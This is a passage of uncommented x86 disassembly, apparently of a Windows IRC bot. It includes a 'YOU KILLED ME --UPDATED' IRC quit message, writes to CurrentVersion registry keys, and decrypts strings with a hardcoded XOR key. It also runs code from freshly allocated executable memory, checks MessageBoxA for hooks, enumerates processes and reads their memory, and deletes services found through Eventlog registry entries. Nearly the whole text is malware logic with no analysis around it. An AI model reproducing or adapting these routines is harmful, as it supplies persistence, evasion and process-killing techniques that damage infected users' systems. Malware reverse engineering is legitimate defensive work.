lea esi, [ebp+var_1CC]
mov ebx, offset byte_425119
call sub_4196D1
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_416F32
add esp, 0Ch
push edi
mov eax, esi
push 0
push eax
call sub_407B70
add esp, 0Ch
call sub_4190BD
push [ebp+var_298]
mov edi, offset dword_4269BC
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_4172CC
pop ecx
pop ecx
push 0
call ds:dword_41D050
int 3 ; Trap to Debugger
jmp ds:dword_41D090
sub_419477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EC proc near ; CODE XREF: seg000:loc_41BC29�p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0CC
mov esi, offset dword_420700
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0C0
mov esi, eax
cmp esi, edi
jnz short loc_419635
loc_419631: ; CODE XREF: sub_4195EC+58�j
xor al, al
jmp short loc_419668
; ---------------------------------------------------------------------------
loc_419635: ; CODE XREF: sub_4195EC+43�j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C4
test eax, eax
jnz short loc_419631
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C8
cmp [ebp+var_13], 0D0h
setnbe al
loc_419668: ; CODE XREF: sub_4195EC+47�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4195EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419677 proc near ; CODE XREF: seg000:0041BC07�p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:dword_41D0E8
push eax
call ds:dword_41D0EC
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D1 proc near ; CODE XREF: sub_40177B+81�p
; sub_4019F3+81�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0]
xor edi, edi
push edi
push esi
call sub_407B70
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_4196EA: ; CODE XREF: sub_4196D1+1E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4196EA
sub eax, ecx
jz short loc_41975B
mov eax, [ebp+arg_0]
dec eax
mov [ebp+var_4], eax
loc_4196FC: ; CODE XREF: sub_4196D1+88�j
mov eax, offset aHjdxzopvuvmrjf ; "hJdXZOPvUVmRJfVS"
lea edx, [eax+1]
loc_419704: ; CODE XREF: sub_4196D1+38�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419704
sub eax, edx
jz short loc_419711
xor eax, eax
loc_419711: ; CODE XREF: sub_4196D1+3C�j
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr ds:aHjdxzopvuvmrjf[eax] ; "hJdXZOPvUVmRJfVS"
xor ecx, eax
xor ecx, 0FDh
push ecx
push esi
push offset dword_42072C
push [ebp+var_4]
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41973C: ; CODE XREF: sub_4196D1+70�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41973C
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_41974E: ; CODE XREF: sub_4196D1+82�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41974E
sub eax, ecx
cmp edi, eax
jb short loc_4196FC
loc_41975B: ; CODE XREF: sub_4196D1+22�j
mov eax, esi
pop edi
leave
retn
sub_4196D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419760 proc near ; CODE XREF: sub_419C1D+28�p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_4219D0
call __SEH_prolog4
mov edi, ds:dword_41D108
call edi
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:dword_41D028
call esi
test eax, eax
jnz short loc_41979B
loc_419790: ; CODE XREF: sub_419760+61�j
; sub_419760+8A�j ...
call ds:dword_41D0F0
jmp loc_41982F
; ---------------------------------------------------------------------------
loc_41979B: ; CODE XREF: sub_419760+2E�j
cmp [ebp+var_38], 1
jz loc_41982D
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197A7: ; CODE XREF: sub_419760+79�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz short loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_4197D5: ; CODE XREF: sub_419760+45�j
cmp [ebp+var_38], 3
jz short loc_4197A7
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:dword_41D01C
test eax, eax
jz short loc_419790
jmp short loc_419827
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_419760+73�j
; sub_419760+C5�j
mov eax, 5B4h
jmp short loc_41982F
; ---------------------------------------------------------------------------
loc_4197F5: ; CODE XREF: sub_419760+CB�j
push [ebp+var_24]
call ds:dword_41D0FC
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi
test eax, eax
jz loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_419827: ; CODE XREF: sub_419760+8C�j
cmp [ebp+var_38], 1
jnz short loc_4197F5
loc_41982D: ; CODE XREF: sub_419760+3F�j
; sub_419760+67�j ...
xor eax, eax
loc_41982F: ; CODE XREF: sub_419760+36�j
; sub_419760+93�j
call __SEH_epilog4
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419835 proc near ; CODE XREF: sub_419EA0+2C7�p
; sub_419EA0+36E�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:dword_41D034
test eax, eax
jnz short loc_41985C
loc_419858: ; CODE XREF: sub_419835+5F�j
xor al, al
jmp short loc_4198CD
; ---------------------------------------------------------------------------
loc_41985C: ; CODE XREF: sub_419835+21�j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:dword_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi
mov edi, ds:dword_41D0F0
call edi
test eax, eax
jnz short loc_419858
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_4198B2
or [ebp+var_14], 2
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198B2: ; CODE XREF: sub_419835+75�j
and [ebp+var_14], 0FFFFFFFDh
loc_4198B6: ; CODE XREF: sub_419835+7B�j
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi
call edi
neg eax
sbb al, al
inc al
loc_4198CD: ; CODE XREF: sub_419835+25�j
pop edi
pop esi
pop ebx
leave
retn
sub_419835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198D2 proc near ; CODE XREF: sub_419EA0+400�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+arg_C]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_426570
test eax, eax
jnz short loc_419909
loc_4198F9: ; CODE XREF: sub_4198D2+70�j
; sub_4198D2+74�j
push [ebp+arg_C]
call sub_402B9B
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_4198D2+25�j
xor eax, eax
loc_41990B: ; CODE XREF: sub_4198D2+6C�j
and [ebp+var_4], 0
mov edx, offset dword_4255E8
loc_419914: ; CODE XREF: sub_4198D2+66�j
mov esi, [ebp+arg_C]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_419944
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_419914
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41990B
xor bl, bl
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_419944: ; CODE XREF: sub_4198D2+53�j
mov bl, 1
jmp short loc_4198F9
sub_4198D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419948 proc near ; CODE XREF: sub_419EA0+483�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_41996A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419948+1C�j
; sub_419948+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41998E
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D4
cmp eax, 0FFFFFFFFh
jz short loc_41999F
loc_41998E: ; CODE XREF: sub_419948+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_41996A
loc_41999F: ; CODE XREF: sub_419948+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_419948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199AC proc near ; CODE XREF: sub_419EA0+3BD�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call ds:dword_42656C
test eax, eax
jnz short loc_4199CE
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_4199AC+1C�j
; sub_4199AC+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_4199F2
push [ebp+var_14]
push 0
push 1F03FFh
call ds:dword_426580
push eax
call ds:dword_41D0D8
cmp eax, 0FFFFFFFFh
jz short loc_419A03
loc_4199F2: ; CODE XREF: sub_4199AC+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call ds:dword_426590
test eax, eax
jnz short loc_4199CE
loc_419A03: ; CODE XREF: sub_4199AC+44�j
push [ebp+arg_4]
call ds:dword_41D0DC
mov al, 1
leave
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A10 proc near ; CODE XREF: sub_419EA0+3D4�p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call ds:dword_426574
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419A49
loc_419A39: ; CODE XREF: sub_419A10+53�j
xor al, al
loc_419A3B: ; CODE XREF: sub_419A10+8D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_419A10+27�j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call ds:dword_426568
test eax, eax
jz short loc_419A39
loc_419A65: ; CODE XREF: sub_419A10+6B�j
inc ebx
cmp ebx, 1
jz short loc_419A81
lea eax, [ebp+var_228]
push eax
push edi
call ds:dword_426584
test eax, eax
jnz short loc_419A65
xor bl, bl
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A81: ; CODE XREF: sub_419A10+59�j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_419A94: ; CODE XREF: sub_419A10+6F�j
push edi
call ds:dword_41D0DC
mov al, bl
jmp short loc_419A3B
sub_419A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_419A9F proc near ; CODE XREF: sub_419E55+2D�p
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx
push eax
mov [ebp+1B4h+var_234], offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call sub_407B70
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4255DC
mov [ebp+1B4h+var_220], 2
loc_419B18: ; CODE XREF: sub_419A9F+160�j
mov [ebp+1B4h+var_208], ebx
loc_419B1B: ; CODE XREF: sub_419A9F+153�j
mov eax, [ebp+1B4h+var_208]
mov eax, [ebp+eax*4+1B4h+var_234]
lea ecx, [ebp+1B4h+var_210]
push ecx
push 1
push ebx
push eax
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call ds:dword_41D02C
test eax, eax
jnz loc_419BE2
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
mov [ebp+1B4h+var_218], ebx
push ebx
jmp short loc_419BCE
; ---------------------------------------------------------------------------
loc_419B58: ; CODE XREF: sub_419A9F+13D�j
xor edi, edi
loc_419B5A: ; CODE XREF: sub_419A9F+10C�j
mov eax, [ebp+1B4h+var_224]
lea edx, [eax+1]
loc_419B60: ; CODE XREF: sub_419A9F+C6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419B60
sub eax, edx
push eax
push [ebp+1B4h+var_224]
lea eax, [ebp+edi+1B4h+var_204]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419B99
lea eax, [ebp+1B4h+var_104]
push eax
mov eax, [ebp+1B4h+var_208]
push [ebp+eax*4+1B4h+var_234]
mov eax, [ebp+1B4h+var_20C]
push dword ptr [eax]
call sub_416F32
add esp, 0Ch
loc_419B99: ; CODE XREF: sub_419A9F+DD�j
lea eax, [ebp+1B4h+var_204]
inc edi
lea edx, [eax+1]
loc_419BA0: ; CODE XREF: sub_419A9F+106�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_419BA0
sub eax, edx
cmp edi, eax
jbe short loc_419B5A
inc [ebp+1B4h+var_218]
lea eax, [ebp+1B4h+var_214]
push eax
lea eax, [ebp+1B4h+var_204]
push eax
push ebx
push ebx
lea eax, [ebp+1B4h+var_21C]
push eax
lea eax, [ebp+1B4h+var_104]
push eax
push [ebp+1B4h+var_218]
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
loc_419BCE: ; CODE XREF: sub_419A9F+B7�j
push [ebp+1B4h+var_210]
call ds:dword_41D020
cmp eax, 103h
jnz loc_419B58
loc_419BE2: ; CODE XREF: sub_419A9F+98�j
push [ebp+1B4h+var_210]
call ds:dword_41D010
inc [ebp+1B4h+var_208]
cmp [ebp+1B4h+var_208], 4
jb loc_419B1B
add [ebp+1B4h+var_20C], 4
dec [ebp+1B4h+var_220]
jnz loc_419B18
mov ecx, [ebp+1B4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 1B4h
leave
retn
sub_419A9F endp
; =============== S U B R O U T I N E =======================================
sub_419C1D proc near ; CODE XREF: sub_419C6D+189�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
push 0F003Fh
push 0
push 0
call ds:dword_41D024
push 0F01FFh
push [esp+10h+arg_0]
mov esi, eax
push esi
call ds:dword_41D044
mov edi, eax
mov ebx, edi
call sub_419760
push edi
call ds:dword_41D03C
test eax, eax
jz short loc_419C69
mov bl, 1
loc_419C57: ; CODE XREF: sub_419C1D+4E�j
push esi
mov esi, ds:dword_41D040
call esi
push edi
call esi
pop edi
pop esi
mov al, bl
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419C69: ; CODE XREF: sub_419C1D+36�j
xor bl, bl
jmp short loc_419C57
sub_419C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C0h
sub_419C6D proc near ; CODE XREF: sub_419E55+35�p
; sub_419E55:loc_419E92�p
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_233 = byte ptr -233h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-2C0h]
sub esp, 340h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C0h+var_4], eax
push esi
mov eax, [ebp+2C0h+arg_0]
push edi
push 0Bh
pop ecx
mov esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
lea edi, [ebp+2C0h+var_34]
rep movsd
movsw
mov esi, 0FFh
push esi
mov [ebp+2C0h+var_340], eax
xor edi, edi
lea eax, [ebp+2C0h+var_233]
push edi
push eax
mov [ebp+2C0h+var_234], 0
call sub_407B70
push esi
lea eax, [ebp+2C0h+var_133]
push edi
push eax
mov [ebp+2C0h+var_134], 0
call sub_407B70
add esp, 18h
lea eax, [ebp+2C0h+var_33C]
push eax
push 0F003Fh
push edi
lea eax, [ebp+2C0h+var_34]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz loc_419E35
push ebx
mov ebx, 100h
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push edi
push [ebp+2C0h+var_33C]
mov [ebp+2C0h+var_338], edi
call ds:dword_41D018
cmp eax, 103h
jz loc_419E34
jmp short loc_419D2A
; ---------------------------------------------------------------------------
loc_419D25: ; CODE XREF: sub_419C6D+1C1�j
mov esi, 0FFh
loc_419D2A: ; CODE XREF: sub_419C6D+B6�j
push ebx
lea eax, [ebp+2C0h+var_334]
push edi
push eax
call sub_407B70
push ebx
lea eax, [ebp+2C0h+var_234]
push edi
push eax
call sub_407B70
lea eax, [ebp+2C0h+var_134]
push eax
lea eax, [ebp+2C0h+var_34]
push eax
push offset aSS_1 ; "%s\\%s"
lea eax, [ebp+2C0h+var_234]
push esi
push eax
call sub_402AEE
lea eax, [ebp+2C0h+var_234]
add esp, 2Ch
lea esi, [eax+1]
loc_419D6F: ; CODE XREF: sub_419C6D+107�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419D6F
sub eax, esi
mov [ebp+eax+2C0h+var_234], cl
lea eax, [ebp+2C0h+var_134]
push offset aLdm ; "LDM"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_419E12
push 7
mov edi, offset aNetdde ; "NetDDE"
lea esi, [ebp+2C0h+var_134]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_419E10
push ebx
lea eax, [ebp+2C0h+var_334]
push eax
push offset aEventmessagefi ; "EventMessageFile"
lea eax, [ebp+2C0h+var_234]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_419E10
xor esi, esi
loc_419DCB: ; CODE XREF: sub_419C6D+1A1�j
mov eax, [ebp+2C0h+var_340]
lea edx, [eax+1]
loc_419DD1: ; CODE XREF: sub_419C6D+169�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419DD1
sub eax, edx
push eax
push [ebp+2C0h+var_340]
lea eax, [ebp+esi+2C0h+var_334]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_419DFC
lea eax, [ebp+2C0h+var_134]
push eax
call sub_419C1D
pop ecx
loc_419DFC: ; CODE XREF: sub_419C6D+180�j
lea eax, [ebp+2C0h+var_334]
inc esi
lea edx, [eax+1]
loc_419E03: ; CODE XREF: sub_419C6D+19B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419E03
sub eax, edx
cmp esi, eax
jbe short loc_419DCB
loc_419E10: ; CODE XREF: sub_419C6D+13B�j
; sub_419C6D+15A�j
xor edi, edi
loc_419E12: ; CODE XREF: sub_419C6D+127�j
inc [ebp+2C0h+var_338]
push ebx
lea eax, [ebp+2C0h+var_134]
push eax
push [ebp+2C0h+var_338]
push [ebp+2C0h+var_33C]
call ds:dword_41D018
cmp eax, 103h
jnz loc_419D25
loc_419E34: ; CODE XREF: sub_419C6D+B0�j
pop ebx
loc_419E35: ; CODE XREF: sub_419C6D+8A�j
push [ebp+2C0h+var_33C]
call ds:dword_41D010
mov ecx, [ebp+2C0h+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2C0h
leave
retn
sub_419C6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E55 proc near ; CODE XREF: sub_419EA0+42A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push [ebp+arg_0]
call ds:dword_41D0F8
test eax, eax
jz short loc_419E9C
push 7D0h
call ds:dword_41D0FC
push [ebp+arg_4]
call ds:dword_41D0D0
test eax, eax
push [ebp+arg_8]
jz short loc_419E92
call sub_419A9F
push [ebp+arg_8]
call sub_419C6D
pop ecx
jmp short loc_419E97
; ---------------------------------------------------------------------------
loc_419E92: ; CODE XREF: sub_419E55+2B�j
call sub_419C6D
loc_419E97: ; CODE XREF: sub_419E55+3B�j
pop ecx
mov al, 1
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419E9C: ; CODE XREF: sub_419E55+10�j
xor al, al
pop ebp
retn
sub_419E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EA0 proc near ; DATA XREF: seg000:0041BF57�o
var_569 = byte ptr -569h
var_568 = dword ptr -568h
var_564 = dword ptr -564h
var_560 = dword ptr -560h
var_55C = dword ptr -55Ch
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_540 = dword ptr -540h
var_524 = byte ptr -524h
var_420 = byte ptr -420h
var_318 = byte ptr -318h
var_317 = byte ptr -317h
var_210 = byte ptr -210h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 56Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+56Ch+var_4], eax
push ebx
push esi
push edi
xor ebx, ebx
push 103h
lea eax, [esp+57Ch+var_317]
push ebx
push eax
mov [esp+584h+var_318], bl
call sub_407B70
add esp, 0Ch
mov [esp+578h+var_558], offset dword_420744
mov [esp+578h+var_554], offset dword_420754
mov [esp+578h+var_550], offset dword_420760
call sub_402AE8
mov edi, ds:dword_41D0E4
push offset aOpenthread ; "OpenThread"
push offset aKernel32_dll_0 ; "kernel32.dll"
mov [esp+580h+var_54C], eax
call edi
mov esi, ds:dword_41D0EC
push eax
call esi
push offset aOpenprocess ; "OpenProcess"
push offset aKernel32_dll_1 ; "kernel32.dll"
mov ds:dword_426580, eax
call edi
push eax
call esi
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push offset aKernel32_dll_2 ; "kernel32.dll"
mov ds:dword_42658C, eax
call edi
push eax
call esi
push offset aProcess32first ; "Process32First"
push offset aKernel32_dll_3 ; "kernel32.dll"
mov ds:dword_426574, eax
call edi
push eax
call esi
push offset aProcess32next ; "Process32Next"
push offset aKernel32_dll_4 ; "kernel32.dll"
mov ds:dword_426578, eax
call edi
push eax
call esi
push offset aModule32first ; "Module32First"
push offset aKernel32_dll_5 ; "kernel32.dll"
mov ds:dword_42657C, eax
call edi
push eax
call esi
push offset aModule32next ; "Module32Next"
push offset aKernel32_dll_6 ; "kernel32.dll"
mov ds:dword_426568, eax
call edi
push eax
call esi
push offset aThread32first ; "Thread32First"
push offset aKernel32_dll_7 ; "kernel32.dll"
mov ds:dword_426584, eax
call edi
push eax
call esi
push offset aThread32next ; "Thread32Next"
push offset aKernel32_dll_8 ; "kernel32.dll"
mov ds:dword_42656C, eax
call edi
push eax
call esi
push offset aReadprocessmem ; "ReadProcessMemory"
push offset aKernel32_dll_9 ; "kernel32.dll"
mov ds:dword_426590, eax
call edi
push eax
call esi
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push offset aPsapi_dll ; "psapi.dll"
mov ds:dword_426570, eax
call ds:dword_41D0E8
push eax
call esi
cmp ds:dword_426580, ebx
mov ds:dword_426588, eax
jz loc_41A36B
cmp ds:dword_42658C, ebx
jz loc_41A36B
cmp ds:dword_426574, ebx
jz loc_41A36B
cmp ds:dword_426578, ebx
jz loc_41A36B
cmp ds:dword_42657C, ebx
jz loc_41A36B
cmp ds:dword_426568, ebx
jz loc_41A36B
cmp ds:dword_426584, ebx
jz loc_41A36B
cmp ds:dword_42656C, ebx
jz loc_41A36B
cmp ds:dword_426590, ebx
jz loc_41A36B
cmp ds:dword_426570, ebx
jz loc_41A36B
cmp eax, ebx
jz loc_41A36B
mov edi, 104h
push edi
lea eax, [esp+57Ch+var_318]
push eax
call ds:dword_41D0F4
lea eax, [esp+578h+var_558]
xor esi, esi
mov [esp+578h+var_568], eax
loc_41A087: ; CODE XREF: sub_419EA0+238�j
mov ecx, [esp+578h+var_568]
push dword ptr [ecx]
lea ecx, [esp+57Ch+var_318]
push ecx
push offset aSS_2 ; "%s\\%s"
lea eax, [esp+esi+584h+var_210]
push 103h
push eax
call sub_402AEE
lea eax, [esp+esi+58Ch+var_210]
add esp, 14h
lea ecx, [eax+1]
loc_41A0B9: ; CODE XREF: sub_419EA0+21E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41A0B9
